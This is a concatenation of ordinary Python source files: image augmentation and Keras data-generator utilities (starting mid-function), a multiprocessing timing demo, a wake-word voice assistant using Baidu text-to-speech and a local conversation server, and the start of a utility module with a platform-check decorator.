data = requests.get(filename).content
data = np.frombuffer(data, np.uint8)
image = cv2.imdecode(data, cv2.IMREAD_COLOR)
if image is None:
raise Exception
except:
raise ValueError('Incorrect url path: \n {}'.format(filename))
else:
raise ValueError('Invalid value for filemode.')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # change from default BGR OpenCV format to Python's RGB format
return image
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
"""
Standardize batch to feed the net. Adapted from [1] to replace the default imagenet mean and std.
[1] https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
Parameters
----------
batch : list of numpy arrays
mean_RGB, std_RGB : list of floats, len=3
Mean/std RGB values for your dataset.
channels_first : bool
Use batch of shape (N, C, H, W) instead of (N, H, W, C)
Returns
-------
Numpy array
"""
assert type(batch) is list, "Your batch must be a list of numpy arrays"
mean_RGB, std_RGB = np.array(mean_RGB), np.array(std_RGB)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
if mode == 'caffe':
batch = batch[:, :, :, ::-1] # switch from RGB to BGR
if mode == 'tf':
batch /= 127.5  # scale to roughly [-1, 1]
if mode == 'torch':
batch /= std_RGB
if channels_first:
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
return batch.astype(np.float32)
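# Illustrative sketch (not part of the original module): preprocessing a list of two
# dummy 224x224 RGB images in 'tf' mode; the RGB statistics are example values only.
def _example_preprocess():
    ims = [np.zeros((224, 224, 3), dtype=np.uint8) for _ in range(2)]
    return preprocess_batch(ims, mean_RGB=[107.6, 112.1, 81.0],
                            std_RGB=[52.8, 50.6, 50.9], mode='tf')  # shape (2, 224, 224, 3)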
def augment(im, params=None):
"""
Perform data augmentation on some image using the albumentations package.
Parameters
----------
im : Numpy array
params : dict or None
Contains the data augmentation parameters
Mandatory keys:
- h_flip ([0,1] float): probability of performing a horizontal left-right mirroring.
- v_flip ([0,1] float): probability of performing a vertical up-down mirroring.
- rot ([0,1] float): probability of performing a rotation to the image.
- rot_lim (int): max degrees of rotation.
- stretch ([0,1] float): probability of randomly stretching an image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- blur ([0,1] float): probability of randomly blurring an image.
- pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
- pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
- cutout ([0,1] float): probability of using cutout in the image.
Returns
-------
Numpy array
"""
## 1) Crop the image
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx, channels = im.shape
crop_size = int(crop * min([ly, lx]))
rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
crop = transforms.Crop(x_min=rand_x,
y_min=rand_y,
x_max=rand_x + crop_size,
y_max=rand_y + crop_size)
im = crop(image=im)['image']
## 2) Now add the transformations for augmenting the image pixels
transform_list = []
# Add random stretching
if params['stretch']:
transform_list.append(
imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
)
# Add random rotation
if params['rot']:
transform_list.append(
transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
)
# Add horizontal flip
if params['h_flip']:
transform_list.append(
transforms.HorizontalFlip(p=params['h_flip'])
)
# Add vertical flip
if params['v_flip']:
transform_list.append(
transforms.VerticalFlip(p=params['v_flip'])
)
# Add some blur to the image
if params['blur']:
transform_list.append(
albumentations.OneOf([
transforms.MotionBlur(blur_limit=7, p=1.),
transforms.MedianBlur(blur_limit=7, p=1.),
transforms.Blur(blur_limit=7, p=1.),
], p=params['blur'])
)
# Add pixel noise
if params['pixel_noise']:
transform_list.append(
albumentations.OneOf([
transforms.CLAHE(clip_limit=2, p=1.),
imgaug_transforms.IAASharpen(p=1.),
imgaug_transforms.IAAEmboss(p=1.),
transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
transforms.RGBShift(p=1.),
transforms.RandomGamma(p=1.)#,
# transforms.JpegCompression(),
# transforms.ChannelShuffle(),
# transforms.ToGray()
], p=params['pixel_noise'])
)
# Add pixel saturation
if params['pixel_sat']:
transform_list.append(
transforms.HueSaturationValue(p=params['pixel_sat'])
)
# Randomly remove some regions from the image
if params['cutout']:
ly, lx, channels = im.shape
scale_low, scale_high = 0.05, 0.25 # min and max size of the squares wrt the full image
scale = np.random.uniform(scale_low, scale_high)
transform_list.append(
transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
)
# Compose all image transformations and augment the image
augmentation_fn = albumentations.Compose(transform_list)
im = augmentation_fn(image=im)['image']
return im
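# Illustrative sketch (not part of the original module): a hypothetical parameter
# dict covering every key that augment() expects; the numeric values are examples only.
_example_aug_params = {
    'h_flip': 0.5, 'v_flip': 0.0, 'rot': 0.3, 'rot_lim': 30,
    'stretch': 0.1, 'crop': 0.9, 'zoom': 0.1,
    'blur': 0.1, 'pixel_noise': 0.1, 'pixel_sat': 0.1, 'cutout': 0.2,
}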
def resize_im(im, height, width):
resize_fn = transforms.Resize(height=height, width=width)
return resize_fn(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Generator to feed Keras fit function
Parameters
----------
inputs : Numpy array, shape (N, H, W, C)
targets : Numpy array, shape (N)
batch_size : int
shuffle : bool
aug_params : dict
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
Returns
-------
Generator of inputs and labels
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
# Create list of indices
idxs = np.arange(len(inputs))
if shuffle:
np.random.shuffle(idxs)
# # Reshape targets to the correct shape
# if len(targets.shape) == 1:
# print('reshaping targets')
# targets = targets.reshape(-1, 1)
for start_idx in range(0, len(inputs) - batch_size + 1, batch_size):
excerpt = idxs[start_idx:start_idx + batch_size]
batch_X = []
for i in excerpt:
im = load_image(inputs[i], filemode='local')
im = augment(im, params=aug_params)
im = resize_im(im, height=im_size, width=im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
batch_y = to_categorical(targets[excerpt], num_classes=num_classes)
yield batch_X, batch_y
def buffered_generator(source_gen, buffer_size=10):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
Author: Benanne (github-kaggle/benanne/ndsb)
Parameters
----------
source_gen : generator
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Returns
-------
Buffered generator
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
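# Illustrative sketch (not part of the original module): composing data_generator
# with buffered_generator so the next batch is prepared in a background thread while
# the current one is consumed. The RGB statistics are example values only.
def _example_buffered_batches(X_train, y_train, num_classes):
    gen = data_generator(X_train, y_train, batch_size=32,
                         mean_RGB=[107.6, 112.1, 81.0], std_RGB=[52.8, 50.6, 50.9],
                         preprocess_mode='tf', aug_params=_example_aug_params,
                         num_classes=num_classes)
    return buffered_generator(gen, buffer_size=4)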
class data_sequence(Sequence):
"""
Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
return batch_X, batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
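# Illustrative sketch (not part of the original module): using data_sequence with
# Keras fit(), which is the main reason to prefer a Sequence over a plain generator
# (it can be consumed safely by multiple workers). `model`, the data arrays and the
# RGB statistics are hypothetical; the worker arguments assume an older tf.keras API.
def _example_fit_with_sequence(model, X_train, y_train, num_classes):
    seq = data_sequence(X_train, y_train, batch_size=32,
                        mean_RGB=[107.6, 112.1, 81.0], std_RGB=[52.8, 50.6, 50.9],
                        preprocess_mode='tf', aug_params=_example_aug_params,
                        num_classes=num_classes)
    model.fit(seq, epochs=10, workers=4, use_multiprocessing=True)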
class data_sequence_lo(Sequence):
"""
Modification of data_sequence that supports locations and passes them to the network. Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, locations, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes, num_locations,
im_size=224, shuffle=True):
"""
Same parameters as in the data_generator function, plus the list of locations and an
int32 with the number of distinct locations.
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.locations = locations
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.num_locations = num_locations
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
batch_locations = to_categorical(self.locations[batch_idxs], num_classes=self.num_locations)
return [batch_X,batch_locations], batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
def standard_tencrop_batch(im, crop_prop=0.9):
"""
Returns an ordered ten crop batch of images from an original image (corners, center + mirrors).
Parameters
----------
im : numpy array, type np.uint8
crop_prop: float, [0, 1]
Size of the crop with respect to the whole image
Returns
-------
List of 10 numpy arrays
"""
batch = []
min_side = np.amin(im.shape[:2])
im = resize_im(im, height=min_side, width=min_side) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = transforms.Crop(x_min=0,
y_min=0,
x_max=crop_size,
y_max=crop_size)(image=im)['image'] # top-left
c2 = transforms.Crop(x_min=0,
y_min=h-crop_size,
x_max=crop_size,
y_max=h)(image=im)['image'] # bottom-left
c3 = transforms.Crop(x_min=w-crop_size,
y_min=0,
x_max=w,
y_max=crop_size)(image=im)['image'] # top-right
c4 = transforms.Crop(x_min=w-crop_size,
y_min=h-crop_size,
x_max=w,
y_max=h)(image=im)['image'] # bottom-right
c5 = transforms.Crop(x_min=np.round((w-crop_size)/2).astype(int),
y_min=np.round((h-crop_size)/2).astype(int),
x_max=np.round((w+crop_size)/2).astype(int),
y_max=np.round((h+crop_size)/2).astype(int))(image=im)['image'] # center
# Save crop and its mirror
lr_aug = albumentations.HorizontalFlip(p=1)
for image in [c1, c2, c3, c4, c5]:
batch.append(image)
batch.append(lr_aug(image=image)['image'])
return batch
class k_crop_data_sequence(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed of multiple crops (default=10) of the same image.
"""
def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
crop_mode : str, {'random', 'standard'}
If 'random', data augmentation is performed randomly.
If 'standard', we take the standard 10 crops (corners + center + mirrors).
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
return batch_X
class k_crop_data_sequence_lo(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed of multiple crops (default=10) of the same image.
"""
def __init__(self, inputs,locations, num_locations,mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
locations: list of location tags
num_locations: number of different locations
crop_mode : str, {'random', 'standard'}
If 'random', data augmentation is performed randomly.
If 'standard', we take the standard 10 crops (corners + center + mirrors).
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
"""
self.inputs = inputs
self.locations = locations
self.num_locations = num_locations
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.crop_number = crop_number
self.crop_mode = crop_mode
self.filemode = filemode
self.im_size = im_size
def __len__(self):
return len(self.inputs)
def __getitem__(self, idx):
batch_X = []
im = load_image(self.inputs[idx], filemode=self.filemode)
if self.crop_mode == 'random':
for _ in range(self.crop_number):
if self.aug_params:
im_aug = augment(im, params=self.aug_params)
else:
im_aug = np.copy(im)
im_aug = resize_im(im_aug, height=self.im_size, width=self.im_size)
batch_X.append(im_aug) # shape (N, 224, 224, 3)
if self.crop_mode == 'standard':
batch_X = standard_tencrop_batch(im)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
nuevo_batch = []
for i in range(self.crop_number):
nuevo_batch.append(self.locations[idx])
batch_locations = to_categorical(nuevo_batch, num_classes=self.num_locations)
return [batch_X,batch_locations]
#return batch_X
def im_stats(filename):
"""
Helper for function compute_meanRGB
"""
im = load_image(filename, filemode='local')
mean = np.mean(im, axis=(0, 1))
std = np.std(im, axis=(0, 1))
return mean.tolist(), std.tolist()
def compute_meanRGB(im_list, verbose=False, workers=4):
"""
Returns the mean and std RGB values for the whole dataset.
For example in the plantnet dataset we have:
mean_RGB = np.array([ 107.59348955, 112.1047813 , 80.9982362 ])
std_RGB = np.array([ 52.78326119, 50.56163087, 50.86486131])
Parameters
----------
im_list : array of strings
Array where the first column is image_path (or image_url). Shape (N,).
verbose : bool
Show progress bar
workers: int
Numbers of parallel workers to perform the computation with.
References
----------
https://stackoverflow.com/questions/41920124/multiprocessing-use-tqdm-to-display-a-progress-bar
"""
print('Computing mean RGB pixel with {} workers...'.format(workers))
with Pool(workers) as p:
r = list(tqdm(p.imap(im_stats, im_list),
total=len(im_list),
disable=not verbose))
r = np.asarray(r)
mean, std = r[:, 0], r[:, 1]
mean, std = np.mean(mean, axis=0), np.mean(std, axis=0)
print('Mean RGB pixel: {}'.format(mean.tolist()))
print('Standard deviation of RGB pixel: {}'.format(std.tolist()))
return mean.tolist(), std.tolist()
def compute_classweights(labels, max_dim=None, mode='balanced'):
"""
Compute the class weights for a set of labels to account for label imbalance.
Parameters
----------
labels : numpy array, type (ints), shape (N)
max_dim : int
Maximum number of classes. Default is the max value in labels.
mode : str, {'balanced', 'log'}
Returns
-------
Numpy array, type (float32), shape (N)
"""
if mode is None:
return None
weights = np.bincount(labels)
weights = np.sum(weights) / weights
# Fill the count if some high number labels are not present in the sample
if max_dim is not None:
diff = max_dim - len(weights)
if diff != 0:
weights = np.pad(weights, pad_width=(0, diff), mode='constant', constant_values=0)
# Transform according to different modes
if mode == 'balanced':
pass
elif mode == 'log':
# do not use --> produces numerical instabilities at inference when transferring weights trained on GPU to CPU
weights = np.log(weights) # + 1
else:
raise ValueError('{} is not a valid option for parameter "mode"'.format(mode))
return weights.astype(np.float32)
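# Illustrative worked example (not part of the original module): for labels
# [0, 0, 0, 1], the counts are [3, 1], so the 'balanced' weights are
# sum/count = [4/3, 4.0]; the rarer class gets the larger weight.
def _example_class_weights():
    weights = compute_classweights(np.array([0, 0, 0, 1]), mode='balanced')
    return weights  # array([1.3333334, 4.], dtype=float32)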
def json_friendly(d):
"""
Return a json friendly dictionary (mainly remove numpy data types)
"""
new_d = {}
for k, v in d.items():
if isinstance(v, (np.float32, np.float64)):
v = float(v)
elif isinstance(v, (np.ndarray, list)):
if isinstance(v[0], (np.float32, np.float64)):
v = np.array(v).astype(float).tolist()
else:
v = np.array(v).tolist()
new_d[k] = v
return new_d
|
Parallel_methods.py
|
#!/usr/bin/python
import multiprocessing as mp
import numpy as np
import time
data = ""
list_method = ["no", "starmap", "parallel"]
def main_script():
global min_check
global max_check
if __name__ == '__main__':
restart = ""
method = ""
method_chosen = False
threads_num = "0"
calc_num = "0"
min_check = -1
max_check = 11
print("\n\"no\" for no parallelization, \"starmap\" for pool.starmap_async(), \"parallel\" for parallel.")
while not method_chosen:
method = input("Which method would you like to try? ")
for i in range(len(list_method)):
if method == list_method[i]:
method_chosen = True
if method.lower() != "no" and method.lower() != "parallel":
while not threads_num.isdigit() or mp.cpu_count() < int(threads_num) or int(threads_num) <= 0:
threads_num = input(
f"\nType in the number of CPU threads you would like to use ({mp.cpu_count()} threads available): ")
threads_num = int(threads_num)
while not calc_num.isdigit() or not int(calc_num) > 0:
calc_num = input("\nType in the number of calculcations to be made: ")
calc_num = int(calc_num)
set_range()
if __name__ == '__main__':
global data
if method.lower() != "no" and method.lower() != "parallel":
pool = mp.Pool(threads_num)
print("\nCPU thread pool defined! (" + str(threads_num) + ")")
# Without multiprocessing/parallelization
if method.lower() == "no":
print("\nWorking...")
time_started = time.time()
for i in range(calc_num):
prepare_data()
results = []
for row in data:
results.append(count_within_range(row, min=min_check, max=max_check))
print("RESULTS #" + str(i + 1) + ": " + str(results[:10]))
# mp.Process - parallelization
if method.lower() == "parallel":
results = mp.Manager().list()
if calc_num >= 6:
calc_curr = 6
else:
calc_curr = calc_num
print("\nWorking...")
time_started = time.time()
while calc_num > 0:
processes = []
if calc_curr > calc_num:
calc_curr = calc_num
for i in range(calc_curr):
p = mp.Process(target=count_within_range_parallel, args=[results, min_check, max_check])
p.start()
processes.append(p)
calc_num -= 1
for process in processes:
process.join()
results = [results[x:x + 10] for x in range(0, len(results), 10)]
for j in range(len(results)):
print("RESULTS #" + str(j + 1) + ": " + str(results[j]))
# pool.starmap_async()
if method.lower() == "starmap":
print("\nWorking...")
time_started = time.time()
for i in range(calc_num):
prepare_data()
results = pool.starmap_async(count_within_range, [(row, min_check, max_check, i) for i, row in enumerate(data)]).get()
print("RESULTS #" + str(i + 1) + ": " + str(results[:10]))
pool.close()
# pool.map()
'''if method.lower() == "map":
print("Working...")
results = pool.map(count_within_range, [row for row in data])
pool.close()
print("RESULTS #" + str(results_num) + ": " + str(results[:10]))
results_num += 1'''
# pool.apply()
'''if method.lower() == "apply":
for i in range(calc_num):
print("Working...")
results = [pool.apply(count_within_range, args=(row, 2, 8)) for row in data]
print("RESULTS #" + str(results_num) + ": " + str(results[:10]))
results_num += 1
pool.close()'''
time_ended = time.time()
print("------------------------------------------------")
print("Time taken to calculate data: " + "%.2f" % (time_ended - time_started) + " seconds.")
while restart.lower() != "y" and restart.lower() != "n":
restart = input("\nRestart script y/(n)? ")
if restart.lower() == "y":
print("\nRestarting...")
main_script()
else:
quit()
# --------------------------------------END OF CALCULATIONS-----------------------------------------
def prepare_data():
global data
np.random.seed(100)
arr = np.random.randint(0, 10, size=[200000, 5])
data = arr.tolist()
def count_within_range(row, min=2, max=8, i=None):
count = 0
for n in row:
if min <= n <= max:
count = count + 1
return count
def count_within_range_parallel(results, min=2, max=8):
global data
prepare_data()
loops = 0
for row in data:
loops += 1
count = 0
for n in row:
if int(min) <= n <= int(max):
count = count + 1
results.append(count)
if loops == 10:
break
def set_range():
print("\nNow, set the range to check how many numbers lie in it. (... in range(2, 8)) ")
print("Allowed range is from 0 to 10.")
print("Maximum number has to be higher than minimum number or equal to it!")
def set_numbers():
global min_check
global max_check
while int(min_check) < 0 or int(min_check) > 9:
min_check = input("\nChoose the minimum number, leave empty for default (default=2): ")
if str(min_check).isspace() or not str(min_check):
min_check = 2
elif not str(min_check).isnumeric():
min_check = -1
while (int(max_check) > 10 or int(max_check) < 1) or int(max_check) < int(min_check):
print("\nChoose the maximum number, leave empty for default (default=8).")
max_check = input("Type \"min\" to change minimum number: ")
if str(max_check).lower() == "min":
set_numbers()
elif not str(max_check) or str(max_check).isspace():
max_check = 8
elif str(max_check) != "min" and not str(max_check).isnumeric():
max_check = 11
set_numbers()
main_script()
|
detect.py
|
# detect.py
import os
import base64
import json
import pyaudio
import pygame
import requests
import wave
import time
import datetime
import numpy as np
from pocketsphinx import LiveSpeech
from multiprocessing import Process
import psutil
CHUNK = 1024  # frames per buffer
FORMAT = pyaudio.paInt16  # sample format (16-bit)
CHANNELS = 1  # mono
RATE = 16000  # sampling rate
API_KEY = ''  # apply for this at Baidu
SECRET_KEY = ''  # apply for this at Baidu
# URL for fetching the access token
TOKEN_URL = 'http://openapi.baidu.com/oauth/2.0/token'
# text-to-speech URL
T2V_URL = 'https://tsn.baidu.com/text2audio'
# Conversation: voice dialogue URL
CON_URL = 'http://127.0.0.1:5000/conversation'
# Text Conversation: text dialogue URL
T_CON_URL = 'http://127.0.0.1:5000/text_conversation'
# bus reminder URL
BUS_ALARM_URL = 'http://192.168.43.145:9090/bus/get_audio/text'
def record_audio(wave_out_path, max_record_second):
""" Audio recording """
p = pyaudio.PyAudio()  # instantiate the object
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)  # open the stream with the given parameters
less = []
frames = []
for i in range(0, int(RATE / CHUNK * max_record_second)):  # maximum recording time (seconds)
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')+" recording")
data = stream.read(CHUNK)
frames.append(data)
# check whether the volume is above the threshold
volume = np.max(np.frombuffer(data, dtype=np.short))
if volume < 1500:
less.append(-1)
print("below threshold, counting: ", less)
# if this many consecutive chunks carry no voice signal, consider the audio finished
if len(less) == 5:
break
else:
less = []
stream.stop_stream()  # close the stream
stream.close()
p.terminate()
print('over')
# save as a wav file
wf = wave.open(wave_out_path, 'wb')  # open the wav file
wf.setnchannels(CHANNELS)  # set the number of channels
wf.setsampwidth(p.get_sample_size(FORMAT))  # set the sample width
wf.setframerate(RATE)  # set the frame rate
wf.writeframes(b''.join(frames))
wf.close()
print('written')
# def play_audio(wave_input_path):
# p = pyaudio.PyAudio()  # instantiate
# wf = wave.open(wave_input_path, 'rb')  # read the wav file
# stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
# channels=wf.getnchannels(),
# rate=wf.getframerate(),
# output=True)
# data = wf.readframes(CHUNK)  # read data
# while len(data) > 0:
# stream.write(data)
# data = wf.readframes(CHUNK)
#
# stream.stop_stream()  # release resources
# stream.close()
# p.terminate()
# prepare the voice payload to send
def prepare_params(voice_file):
# read the file's binary content
f_obj = open(voice_file, 'rb')
content = base64.b64encode(f_obj.read())  # convert to base64
speech = content.decode("utf-8")
size = os.path.getsize(voice_file)
# wrap as json
data = json.dumps({
'speech': speech,
'len': size
})
return data
def fetch_token():
params = {'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY}
resp = requests.post(TOKEN_URL, params)
# print(resp.text)
result = json.loads(resp.text)
# print(result)
if 'access_token' in result.keys():
return result['access_token']
else:
print('MAYBE API_KEY or SECRET_KEY not correct: access_token or scope not found in token response')
# text to speech
def text2mp3(text):
token = fetch_token()
length = len(text)
if length == 0:
text = '什么?'
text = requests.utils.quote(text)
params = {'tex': text,
'tok': token,
'cuid': '1111',
'ctp': 1,
'lan': 'zh',
'spd': 5,
'pit': 5,
'vol': 5,
'per': 4
}
header = {
'Content-Type': 'application/x-www-form-urlencoded'
}
# print post_data
res = requests.post(T2V_URL, data=params, headers=header)
if not isinstance(res, dict):
with open('music/text2voice.mp3', 'wb') as f:
for chunk in res.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
return 'music/text2voice.mp3'
# send the voice to the cloud
def send_voice(voice_file):
# read the file's binary content
f_obj = open(voice_file, 'rb')
content = base64.b64encode(f_obj.read())  # convert to base64
speech = content.decode("utf-8")
size = os.path.getsize(voice_file)
# wrap as json
params = json.dumps({
'speech': speech,
'len': size
})
# send the request
resp = requests.post(CON_URL, data=params)
# return the result
return resp.text
def play_mp3(file):
pygame.mixer.pre_init(16000, -16, 2, 2048)
pygame.mixer.init()
pygame.mixer.music.load(file)
pygame.mixer.music.play(loops=0, start=0.0)
while pygame.mixer.music.get_busy():
time.sleep(1)
pygame.mixer.music.unload()
# query alarm events by the hardware client sno
def alarm():
# query events
# wrap as json
# params = json.dumps({'text_in': '我的公交车还有多久到'})
# send the request
resp = requests.get(BUS_ALARM_URL)
# return the result
return resp.text
# alarm timer
def alarm_timer():
loop = 0
while True:
cur_time = list(time.localtime())
loop = loop + 1
print('alarm-is-working:'+str(loop))
# if cur_time[3] == 22 and cur_time[4] >= 30 and cur_time[4] <= 50: # compare alarm setting time
# rs = alarm('bmango')
# print(rs)
# play_mp3(text2mp3(rs))
alarm_rs = alarm()
if alarm_rs != '':
alarm_mp3 = text2mp3(alarm_rs)
play_mp3(alarm_mp3)
time.sleep(30)
if __name__ == "__main__":
# Start alarm
ala = Process(target=alarm_timer, args=())
ala.start()
print('start a process.')
pause = psutil.Process(ala.pid)
# Start LiveSpeech
speech = LiveSpeech(lm=False, keyphrase='mango', kws_threshold=1e-20)
for phrase in speech:
# clear the wake phrase to avoid being woken repeatedly
speech = ''
# pause the alarm process
if pause.status() == 'running':
pause.suspend()
print(pause.status())
# quick acknowledgement
print("user:", phrase)
print("speaker: coming")
play_mp3("music/nishuoba.mp3")
# human reaction time
# time.sleep(0.3)
# record the question audio
record_audio("music/comm.wav", 5)
# get the answer and convert it to speech
answer_text = send_voice("music/comm.wav")
answer_mp3 = text2mp3(answer_text)
# play the answer audio
play_mp3(answer_mp3)
# time.sleep(2)
# restore the wake phrase
speech = LiveSpeech(lm=False, keyphrase='mango', kws_threshold=1e-20)
# resume the alarm
if pause.status() == "stopped":
pause.resume()
|
__init__.py
|
import hashlib
import platform as _platform_module
import os
from copy import copy, deepcopy
from contextlib import _RedirectStream, suppress
from functools import wraps
from io import StringIO
from threading import Thread
from typing import BinaryIO, Callable, Generator, Iterable, List, Tuple, TypeVar
is_being_run_from_explorer = None
with suppress(ImportError):
import ctypes
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
is_being_run_from_explorer = kernel32.GetConsoleProcessList((ctypes.c_uint * 1)(), 1) <= 2
from colorama import Fore
with suppress(ImportError):
import win10toast
_toaster = win10toast.ToastNotifier()
T = TypeVar('T')
_platform = _platform_module.system().lower()
class PlatformError(Exception):
pass
def requires_platform(platform: str):
"""A decorator that raises an error if a function is run on an
unsupported platform.
Args:
platform (str): The platform name. This can be found with
`platform.system()`. Case is irrelevant.
Raises:
PlatformError: If the running platform does not match the one
dictated in the decorator. This is raised when the decorated
function is run.
Examples:
# if using windows
>>> @requires_platform('windows')
... def f():
... print('Hello, World!')
>>> f()
Hello, World!
>>> @requires_platform('linux')
... def f():
... print('Hello, World!')
>>> f()
Traceback (most recent call last):
...
PlatformError: this operation requires platform 'linux'
"""
platform = platform.lower()
def wrapper(func):
@wraps(func)
def wrapped(*args, **kwargs):
if not platform == _platform:
raise PlatformError(f'this operation requires platform {platform!r}')
func(*args, **kwargs)
